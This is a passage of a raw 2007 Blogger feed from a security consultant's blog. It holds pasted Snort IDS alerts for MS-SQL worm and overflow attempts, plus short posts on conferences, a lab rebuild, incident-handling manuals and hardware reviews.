target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-19:15:19.388509 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://221.195.73.84:1042/" target="_blank"&gt;221.195.73.84:1042&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;&lt;script&gt;&lt;!-- D(["mb","http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc activity] [Priority: 3]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-19:15:19.388509 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://221.195.73.84:1042\" target\u003d_blank\&gt;221.195.73.84:1042\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref\" target\u003d_blank\&gt;http://www.microsoft.com\u003cwbr /\&gt;/technet/security/bulletin\u003cwbr /\&gt;/MS02-039.mspx][Xref\u003c/a\&gt;\u003cbr /\&gt;\u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d10674][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d10674][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003c/div\&gt;",1] );  //--&gt;&lt;/script&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc activity] [Priority: 3]&lt;br /&gt;&lt;br /&gt; 08/14-19:15:19.388509 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://221.195.73.84:1042/" target="_blank"&gt;221.195.73.84:1042&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx%5D%5BXref" target="_blank"&gt;http://www.microsoft.com&lt;wbr&gt;/technet/security/bulletin&lt;wbr&gt;/MS02-039.mspx][Xref&lt;/a&gt;&lt;br /&gt;=&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=10674%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=10674][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;/div&gt;&lt;script&gt;&lt;!-- D(["mb","\u003cdiv style\u003d\"direction:ltr\"\&gt;\u003cspan class\u003dsg\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;--\u003cbr /\&gt;Anthony L. Williams\u003cbr /\&gt;Information Security Architect\u003cbr /\&gt;IRON::Guard Security, LLC  p::206-450-2701  f::206-721-0932\u003cbr /\&gt;Web::\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.ironguard.net/\" target\u003d_blank\&gt;http://www.ironguard.net/\u003c/a\&gt;  Blog::\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://igssec.blogspot.com/\" target\u003d_blank\&gt;http://igssec.blogspot.com/\u003c/a\&gt;\u003cbr /\&gt;Pentesting::Assessments:\u003cwbr /\&gt;:Audits::Incident Response::Managed Security\u003cbr /\&gt;\u003c/span\&gt;\u003c/div\&gt;",0] ); D(["ce"]);  //--&gt;&lt;/script&gt;&lt;span class="sg"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3523958122558272361?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3523958122558272361/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3523958122558272361&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3523958122558272361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3523958122558272361'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/11/when-script-kiddies-attack.html' title='When Script Kiddies Attack!'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7471654743390414876</id><published>2007-11-07T09:13:00.000-08:00</published><updated>2007-11-07T09:16:16.354-08:00</updated><title type='text'>BlackHat Vegas 2007 and Defcon 15 Photos</title><content type='html'>&lt;span style="font-family: verdana;"&gt;Yes, I know these events transpired ages ago.  I wanted to post them here anyway in case anyone was interested in seeing why I will never have a future in photography!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-family: verdana;" href="http://picasaweb.google.com/blackspook/BH2007USAAndDefcon15"&gt;View the photos here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7471654743390414876?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7471654743390414876/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7471654743390414876&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7471654743390414876'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7471654743390414876'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/11/blackhat-vegas-2007-and-defcon-15.html' title='BlackHat Vegas 2007 and Defcon 15 Photos'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1154731513549073822</id><published>2007-11-07T09:06:00.000-08:00</published><updated>2007-11-07T09:12:48.880-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IGS'/><category scheme='http://www.blogger.com/atom/ns#' term='research'/><category scheme='http://www.blogger.com/atom/ns#' term='lab'/><title type='text'>Home/Office Lab</title><content type='html'>&lt;span style="font-family:verdana;"&gt;One of the major undertakings of this recent summer was to rebuild the IGS Lab and Research environment.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;From rats nest to organization.  The majority of equipment was moved off desks and tables onto a rack along with the introduction of actual cable and wiring management.  Additional power was also added to deal with random (and frustrating) power losses.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://picasaweb.google.com/blackspook/LabRebuild/"&gt;View the transformation.&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1154731513549073822?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1154731513549073822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1154731513549073822&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1154731513549073822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1154731513549073822'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/11/homeoffice-lab.html' title='Home/Office Lab'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6621266387109498399</id><published>2007-10-30T07:45:00.000-07:00</published><updated>2007-10-30T07:48:03.331-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Department of Energy'/><category scheme='http://www.blogger.com/atom/ns#' term='incident handling'/><category scheme='http://www.blogger.com/atom/ns#' term='Department of Justice'/><title type='text'>Incident Handling Resources</title><content type='html'>&lt;span style="font-family:verdana;"&gt;Department of Energy Computer Forensic Labs First Responders Manual&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-family: verdana;" onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.mirrors.wiretapped.net/security/info/papers/forensics/DOE-CFL-FirstResponseManual.pdf" target="_blank"&gt;http://www.mirrors.wiretapped&lt;wbr&gt;.net/security/info/papers&lt;wbr&gt;/forensics/DOE-CFL-FirstRespon&lt;wbr&gt;seManual.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Department of Justice Computer Seizure Procedures&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-family: verdana;" onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.cybercrime.gov/s&amp;amp;smanual2002.htm" target="_blank"&gt;http://www.cybercrime.gov/s&lt;wbr&gt;&amp;amp;smanual2002.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;While reading "Incident Response" I came across references to the&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;DOE-CFL manual and after some Google searching found the DOJ offering.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt; Both good reads for those interested in proper procedure for&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;performing IH.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Thoughts?&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6621266387109498399?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6621266387109498399/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6621266387109498399&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6621266387109498399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6621266387109498399'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/10/incident-handline-resources.html' title='Incident Handling Resources'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7242432789755343670</id><published>2007-10-30T01:07:00.000-07:00</published><updated>2007-10-30T07:37:58.414-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='examples'/><title type='text'>Linux By Example</title><content type='html'>&lt;a style="font-family: verdana;" onclick="return top.js.OpenExtLink(window,event,this)" href="http://linux.byexamples.com/" target="_blank"&gt;http://linux.byexamples.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;I stumbled across this in my Internet travels.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;All I can say is WOW!  I could get lost for days on a site like this&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;trying out all of the options and experimenting with the offerings.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Take a look and let me know what you think.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7242432789755343670?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7242432789755343670/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7242432789755343670&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7242432789755343670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7242432789755343670'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/10/linux-by-example.html' title='Linux By Example'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1549726299618624427</id><published>2007-10-28T01:48:00.000-07:00</published><updated>2007-10-30T13:38:54.821-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sip'/><category scheme='http://www.blogger.com/atom/ns#' term='VOIP'/><category scheme='http://www.blogger.com/atom/ns#' term='server impersonation'/><category scheme='http://www.blogger.com/atom/ns#' term='sipera'/><category scheme='http://www.blogger.com/atom/ns#' term='sandro gauci'/><category scheme='http://www.blogger.com/atom/ns#' term='sipvicious'/><title type='text'>VoIP Server Impersonation Issues</title><content type='html'>&lt;span style=";font-family:verdana;font-size:100%;"  &gt;A friend and colleague of mine Sandro Gauci has just posted some interesting information on the blog for his SIP VoIP auditing tool suite Sipvicious:&lt;br /&gt;&lt;br /&gt;http://sipvicious.org/blog/2007/10/server-impersonation-and-sip.html&lt;br /&gt;&lt;br /&gt;While you there if you haven't given Sipvicious a look to assist you in your SIP VoIP auditing I urge you to do so.&lt;br /&gt;&lt;br /&gt;EDIT:&lt;br /&gt;&lt;br /&gt;You can also read more about the issue &lt;a href="http://www.betanews.com/article/Hackers_Can_Tap_Into_Vonage_Lines_Says_Security_Firm/1193330064"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1549726299618624427?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1549726299618624427/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1549726299618624427&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1549726299618624427'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1549726299618624427'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/10/voip-server-impersonation-issues.html' title='VoIP Server Impersonation Issues'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-545380742900429582</id><published>2007-07-13T13:29:00.000-07:00</published><updated>2007-07-13T13:34:31.399-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='social'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='defcon'/><category scheme='http://www.blogger.com/atom/ns#' term='meet'/><title type='text'>Blackhat USA 2007 and Defcon XV Socials</title><content type='html'>I will be in Las Vegas, NV from July 29th to August 5 to attend Blackhat USA 2007 and Defcon XV.  If anyone would like to meet up during that time and swap a few war stories and lies over a cold refreshment feel free to contact me at awilliams [at] ironguard [dot] net.&lt;br /&gt;&lt;br /&gt;I'm always up for meeting new people and sharing ideas.  Hope to see some of you down there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-545380742900429582?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/545380742900429582/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=545380742900429582&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/545380742900429582'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/545380742900429582'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/07/blackhat-usa-2007-and-defcon-xv-socials.html' title='Blackhat USA 2007 and Defcon XV Socials'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-383715023766950370</id><published>2007-07-13T13:24:00.000-07:00</published><updated>2007-07-13T13:29:05.385-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='defcon'/><title type='text'>Apologies for absence</title><content type='html'>I personally apologize for not posting since last month.  Its been a very busy last couple of weeks reorganizing the lab (I will post pictures soon) and preparing for Blackhat USA 2007 and Defcon XV.&lt;br /&gt;&lt;br /&gt;I will post some new content in the very near future.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-383715023766950370?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/383715023766950370/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=383715023766950370&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/383715023766950370'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/383715023766950370'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/07/apologies-for-absence.html' title='Apologies for absence'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2781455036258669266</id><published>2007-06-22T17:16:00.001-07:00</published><updated>2008-12-11T01:34:29.008-08:00</updated><title type='text'>Logitech 2.4 GHz Cordless Presenter</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxnc58RNAI/AAAAAAAAABU/1BRoZb907Fs/s1600-h/3.1.0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxnc58RNAI/AAAAAAAAABU/1BRoZb907Fs/s200/3.1.0.jpg" alt="" id="BLOGGER_PHOTO_ID_5079048226054681602" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;Recently we have found ourselves in need of a cordless presenter.  Details on the device itself can be found on Logitech's web site:&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.logitech.com/index.cfm/mice_pointers/presentation_remote/devices/175&amp;cl=us,en"&gt;http://www.logitech.com/index.cfm/mice_pointers/presentation_remote/devices/175&amp;amp;cl=us,en&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;I have to say we have been pleased with this device.  It functions out of the box with no drivers (yes, it works in Ubuntu linux, I haven't had an opportunity to test it in other operating systems), the USB connector can be stored inside the unit and comes with a neoprene carrying case.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;It has worked flawlessly in MS Powerpoint and OpenOffice Impress.  Overall I would recommend it if you want a cordless presenter that does not function as a mouse.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2781455036258669266?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2781455036258669266/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2781455036258669266&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2781455036258669266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2781455036258669266'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/logitech-24-ghz-cordless-presenter.html' title='Logitech 2.4 GHz Cordless Presenter'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Z4u4MkgQQuE/Rnxnc58RNAI/AAAAAAAAABU/1BRoZb907Fs/s72-c/3.1.0.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6508505260690969386</id><published>2007-06-22T16:41:00.000-07:00</published><updated>2008-12-11T01:34:29.164-08:00</updated><title type='text'>Olympus VN-2100PC and Windows Vista Ultimate</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Z4u4MkgQQuE/RnxepZ8RM6I/AAAAAAAAAAk/EruRD9rkCis/s1600-h/VN-2100PC__m.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_Z4u4MkgQQuE/RnxepZ8RM6I/AAAAAAAAAAk/EruRD9rkCis/s320/VN-2100PC__m.jpg" alt="" id="BLOGGER_PHOTO_ID_5079038545198396322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;It was high time to purchase these for the Incident Response team.  According to the Olympus web site the device is Vista compatible:&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.olympus.co.jp/en/support/imsg/vtrek/compati/winvista.cfm#vn"&gt;http://www.olympus.co.jp/en/support/imsg/vtrek/compati/winvista.cfm#vn&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;Armed with this information I attempted to install the device allowing Vista to perform its automagical powers of detection and stup.  Alas, to no avail.  At this point I resorted to the installation CD that came with the device.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;After running the installation and subsequently launching the executable it terminated immediately.  Based off my previous dealings with Vista I simply allowed Vista to execute the program using Windows XP SP2 compatibility.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;span style="font-size:100%;"&gt;Voila!  Instant access to the device and full functionality.  As is true with all things there is more than one way to skin a cat.  Olympus provides a patch to the software that provides Vista compatibility:&lt;/span&gt;&lt;/p&gt;  